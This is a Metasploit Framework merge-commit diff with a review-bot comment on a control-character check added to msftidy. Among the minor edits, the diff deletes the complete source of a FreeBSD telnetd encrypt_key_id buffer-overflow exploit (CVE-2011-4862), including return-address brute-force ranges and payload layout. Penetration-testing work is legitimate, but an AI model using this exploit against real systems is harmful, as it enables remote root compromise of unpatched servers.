
Merge branch 'release/20120110000001' into stable

commit 7f9cd45dcac427dd0a77d6875851e33d9ae0c58b 2 parents 9a37792 + 5700bf9
@jcran jcran authored
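--- a/modules/auxiliary/analyze/jtr_aix.rb
+++ b/modules/auxiliary/analyze/jtr_aix.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
 def initialize
 super(
- 'Name' => 'John the Ripper Linux Password Cracker',
+ 'Name' => 'John the Ripper AIX Password Cracker',
 'Version' => '$Revision$',
 'Description' => %Q{
 This module uses John the Ripper to identify weak passwords that have been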
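--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -23,7 +23,7 @@ module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'
 'Author' =>
 [
 'Justin Klein Keane', #Original Discovery
- 'Robin François <rof[at]navixia.com>'
+ 'Robin Francois <rof[at]navixia.com>'
 ],
 'License' => MSF_LICENSE,
 'References' =>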
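--- a/modules/auxiliary/scanner/smtp/smtp_version.rb
+++ b/modules/auxiliary/scanner/smtp/smtp_version.rb
@@ -37,7 +37,6 @@ def run_host(ip)
 banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
 print_status("#{ip}:#{rport} SMTP #{banner_sanitized}")
 report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner)
- print_error("#{rhost}:#{rport} #{e} #{e.backtrace}")
 end
 end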
134 modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb
@@ -1,134 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Brute
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'FreeBSD based telnetd encrypt_key_id brute force',
- 'Description' => %q{
- This module exploits a buffer overflow in the encryption option handler of the
- FreeBSD telnet service.
- },
- 'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
- 'References' =>
- [
- ['BID', '51182'],
- ['OSVDB', '78020'],
- ['CVE', '2011-4862'],
- ['URL', 'http://www.exploit-db.com/exploits/18280/']
- ],
- 'Privileged' => true,
- 'Payload' =>
- {
- 'Space' => 128,
- 'BadChars' => "\x00",
- },
- 'Platform' => [ 'bsd' ],
- 'Targets' =>
- [
- #
- # specific targets
- #
- [ 'Cisco Ironport 7.x Bruteforce',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805cffd },
- 'Stop' => { 'Ret' => 0x0805aa00 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Citrix Netscaler 9.x',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805bffd },
- 'Stop' => { 'Ret' => 0x08059000 },
- 'Step' => 8
- }
- }
- ],
-
- [ 'Other FreeBSD based targets',
- {
- 'Bruteforce' =>
- {
-
- 'Start' => { 'Ret' => 0x0805fffd },
- 'Stop' => { 'Ret' => 0x08050000 },
- 'Step' => 8
- }
- }
- ],
-
-
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Dec 23 2011'))
-
- register_options(
- [
- Opt::RPORT(23),
- ], self.class )
- end
-
- def brute_exploit(addrs)
- curr_ret = addrs['Ret']
- begin
- connect
-
- sock.get_once
- print_status('Initiate encryption mode ...')
-
- req = ''
- req << "\xff\xfa\x26\x00\x01\x01\x12\x13"
- req << "\x14\x15\x16\x17\x18\x19\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- req = ''
- print_status("Trying return address 0x%.8x..." % curr_ret )
- print_status('Sending first payload ...')
-
- req << "\xff\xfa\x26\x07"
- req << "\x00"
- req << make_nops(71)
- penc = payload.encoded.gsub("\xff", "\xff\xff")
- req << [curr_ret].pack('V')
- req << [curr_ret].pack('V')
-
- req << make_nops(128)
- req << penc
- req << "\x90\x90\x90\x90"
- req << "\xff\xf0"
- req << "\x00"
-
- sock.put(req)
- sock.get_once
- print_status('Sending second payload ...')
- sock.put(req)
-
- disconnect
- handler
- rescue
- end
- end
-
-end
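--- a/modules/exploits/multi/http/op5_license.rb
+++ b/modules/exploits/multi/http/op5_license.rb
@@ -17,7 +17,7 @@ def initialize(info = {})
 'Name' => 'OP5 license.php Remote Command Execution',
 'Description' => %q{
 This module exploits an arbitrary root command execution vulnerability in the
- OP5 Monitor license.php. Ekelöw has confirmed that OP5 Monitor versions 5.3.5,
+ OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
 },
 'Author' => [ 'Peter Osterberg <j[at]vel.nu>' ],
@@ -105,4 +105,4 @@ def exploit
 return
 end
 end
-end
+end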
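--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -113,7 +113,7 @@ def check
 # If it has the target footer, we know its vulnerable
 # however skining may mean the reverse is not true
 # We've only tested on v2.6.1, so that is all we will guarantee
- # Example footer: v2.6.1 ©2008 Fonality
+ # Example footer: v2.6.1 &copy;2008 Fonality
 # if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}&copy;200[0-8] Fonality/
 if response.body =~ /(v2\.6\.1)\s{2}&copy;2008 Fonality/
 print_status "Trixbox #{$1} detected!"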
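--- a/modules/exploits/windows/scada/procyon_core_server.rb
+++ b/modules/exploits/windows/scada/procyon_core_server.rb
@@ -32,7 +32,7 @@ def initialize(info={})
 'Version' => '$Revision$',
 'Author' =>
 [
- 'Knud Højgaard <keh[at]nsense.dk>', # Initial discovery
+ 'Knud Hojgaard <keh[at]nsense.dk>', # Initial discovery
 'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
 ],
 'References' =>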
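--- a/tools/msftidy.rb
+++ b/tools/msftidy.rb
@@ -3,7 +3,7 @@
 # Check (recursively) for style compliance violations and other
 # tree inconsistencies.
 #
-# by jduck
+# by jduck and friends
 #
 ##
@@ -82,6 +82,7 @@ def check_single_file(dparts, fparts, f_rel)
 spaces = 0
 bi = []
 ll = []
+ bc = []
 cr = 0
 url_ok = true
 nbo = 0 # non-bin open
@@ -113,6 +114,9 @@ def check_single_file(dparts, fparts, f_rel)
 src_ended = true if ln =~ /^__END__$/
 next if src_ended
+ if ln =~ /[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]/
+ bc << [ idx, ln.inspect]
+ end
 if (ln.length > LONG_LINE_LENGTH)
 ll << [ idx, ln ]
@@ -156,6 +160,14 @@ def check_single_file(dparts, fparts, f_rel)
 }
 end
+ if bc.length > 0
+ puts "%s ... probably has unicode: %u" % [f, bc.length]
+ bc.each { |ec|
+ ec[1] = ec[1].inspect
+ puts ' %8d: %s' % ec
+ }
+ end
+
 show_count(f, 'carriage return EOL', cr)
 show_missing(f, 'incorrect URL to framework site', url_ok)
 show_missing(f, 'writes to stdout', no_stdio)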
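Review bot: The character class added in the third hunk, `/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]/`, stops at `\x19`, so the control bytes 0x1a–0x1f, including ESC (0x1b, the lead byte of terminal escape sequences), pass the check unflagged; the range was presumably meant to be `\x0e-\x1f`. The offending line is also inspected twice, once when stored (`bc << [ idx, ln.inspect]`) and again in the report loop (`ec[1] = ec[1].inspect`), so the printed text comes out double-quoted and double-escaped; storing `bc << [ idx, ln ]` and keeping the single `inspect` in the loop would fix that. Because the class matches control characters as well as bytes 0x7f–0xff, the message "probably has unicode" would read more accurately as something like `puts "%s ... has control or non-ASCII bytes: %u" % [f, bc.length]`. check_single_file starts and ends outside these hunks, so how `ln` is read and which encoding it carries is not visible here.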